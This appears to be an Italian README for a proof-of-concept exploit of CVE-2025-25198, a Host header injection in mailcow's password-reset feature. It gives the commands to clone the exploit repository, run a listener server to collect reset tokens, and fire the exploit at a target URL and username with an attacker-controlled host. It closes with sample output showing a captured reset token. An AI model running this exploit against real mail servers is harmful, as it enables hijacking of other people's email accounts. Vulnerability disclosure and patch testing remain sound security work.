
Cattura i token di reset della password dagli attacchi di iniezione dell'header Host di Mailcow.
mailcow: dockerized è una suite open source di groupware/email basata su docker. Prima della versione 2025-01a, una vulnerabilità nella funzionalità di reset della password di mailcow consente a un attaccante di manipolare l'header Host HTTP per generare un link di reset della password che punta a un dominio controllato dall'attaccante. Questo può portare al takeover dell'account se un utente clicca sul link avvelenato.
Configura un server https per ascoltare tutte le richieste e invia una richiesta POST al sito web con l'header Host contenente il tuo selezionato. Puoi anche usare Burpsuite per inviare la richiesta e ottenere il Token nel server.
git clone https://github.com/enzocipher/CVE-2025-25198.git
cd CVE-2025-25198
sudo go build -o https-server server.go
./https-server
go mod init exploit
go mod tidy
sudo go run exploit.go --base <url> --username <[email protected]> --host <ip>:<port> <--insecure | opzionale >
Dopo aver atteso un po', il server restituirà il token che puoi usare:
Redirigiendo a: http://mi-dominio.com/reset-password?token=F53F8F-CC7A5B-E0CC4C-98680B-A72245